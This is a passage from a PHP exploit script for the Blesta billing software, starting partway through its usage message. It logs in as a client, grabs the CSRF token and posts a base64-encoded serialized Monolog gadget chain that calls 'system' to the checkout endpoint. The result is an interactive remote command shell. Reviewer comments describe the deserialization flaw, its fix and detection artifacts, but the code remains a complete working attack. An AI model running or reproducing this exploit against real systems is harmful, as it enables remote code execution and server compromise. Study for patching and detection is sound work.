\n";
    // NOTE(review): this listing begins partway through the usage message; the
    // opening of this block (presumably an argument check) is not visible here.
    print "\nExample....: php $argv[0] http://localhost/blesta/ egix password";
    print "\nExample....: php $argv[0] https://www.blesta.com/ hacker pwned\n\n";
    die();
}

/*
 * Stand-in for the outer object of the serialized payload.
 *
 * The class only stores one value in $socket. exec_cmd() rewrites every
 * underscore in the serialized string to a backslash, so the data sent to the
 * server names Monolog\Handler\SyslogUdpHandler rather than this local class.
 */
class Monolog_Handler_SyslogUdpHandler
{
    protected $socket;

    function __construct($x)
    {
        $this->socket = $x;
    }
}

/*
 * Stand-in for the inner object of the serialized payload
 * (Monolog\Handler\BufferHandler after the underscore rewrite in exec_cmd()).
 *
 * Property names, visibility and declaration order all end up in the
 * serialized form, so they are kept exactly as written.
 *
 * NOTE(review): $processors receives the function names 'current' and 'system'
 * and $buffer receives the command record; how the target's Monolog code uses
 * these properties is not visible in this listing.
 */
class Monolog_Handler_BufferHandler
{
    protected $handler;
    protected $bufferSize = -1;
    protected $buffer;
    protected $level = null;
    protected $initialized = true;
    protected $bufferLimit = -1;
    protected $processors;

    function __construct($methods, $command)
    {
        $this->processors = $methods;
        $this->buffer = [$command];
        // The handler points back at this same object.
        $this->handler = $this;
    }
}

/*
 * Sends one command to the target and returns the raw HTTP response body.
 *
 * Steps, as written below:
 *   1. Append "; echo CMDDELIM" so the caller can find where the output ends.
 *   2. Nest the two stand-in objects and serialize() them.
 *   3. Replace '_' with '\' in the serialized string, then base64-encode it.
 *   4. POST the result as the `invoices` field using the shared curl handle.
 *
 * NOTE(review): because the payload is a serialized PHP object, the endpoint
 * presumably passes the decoded `invoices` value to unserialize(); confirm
 * against the application source. The defensive fix for that pattern is to
 * stop unserializing request data (use JSON, or pass
 * ['allowed_classes' => false] to unserialize()).
 *
 * Observable artifacts for detection: an authenticated POST whose `invoices`
 * field base64-decodes to a serialized object naming Monolog\Handler classes,
 * and a response body containing the CMDDELIM marker.
 *
 * $url and $token are declared global but are not used in this function.
 */
function exec_cmd($cmd)
{
    global $ch, $url, $token;

    $cmd .= "; echo CMDDELIM";

    $chain = new Monolog_Handler_SyslogUdpHandler(new Monolog_Handler_BufferHandler(['current', 'system'], [$cmd, 'level' => null]));
    $chain = base64_encode(str_replace('_', '\\', serialize($chain)));

    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["invoices" => $chain]));

    return curl_exec($ch);
}

// Command-line arguments: base URL of the installation, then client credentials.
$url = $argv[1];
$user = $argv[2];
$pwd = $argv[3];

$ch = curl_init();

// Start from a clean cookie jar; '@' hides the warning when the file is absent.
@unlink("./cookies.txt");

curl_setopt($ch, CURLOPT_URL, "{$url}client/login/");
// The session cookie is written to and read from the current working directory.
curl_setopt($ch, CURLOPT_COOKIEJAR, "./cookies.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "./cookies.txt");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
// TLS certificate and host-name verification are both switched off, so the
// credentials and session cookie are sent without authenticating the server.
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
//curl_setopt($ch, CURLOPT_PROXY, 'http://127.0.0.1:8080');

// The password is echoed to the terminal in clear text.
print "\n[+] Performing client login with username '{$user}' and password '{$pwd}'\n";

// First request (GET): fetch the login page and extract the anti-CSRF token.
if (!preg_match('/"_csrf_token" value="([^"]+)/i', curl_exec($ch), $token)) die("[-] CSRF token not found!\n\n");

// Second request (POST): submit the login form with the token and credentials.
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query(["_csrf_token" => $token[1], "username" => $user, "password" => $pwd]));

// A response containing "alert-danger" is treated as a failed login.
if (preg_match('/alert-danger/i', curl_exec($ch))) die("[-] Login failed!\n\n");

print "[+] Launching shell\n";

// Every later request goes to this endpoint, reusing the authenticated session.
curl_setopt($ch, CURLOPT_URL, "{$url}client_pay/received/checkout2");

// Read commands from STDIN until "exit"; each one is sent through exec_cmd()
// and the text before the CMDDELIM marker in the response is printed.
while(1)
{
    print "\nblesta-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    // No marker in the response means the command did not run; stop.
    preg_match('/(.*)CMDDELIM/s', exec_cmd($cmd), $m) ? print $m[1] : die("\n[-] Exploit failed!\n\n");
}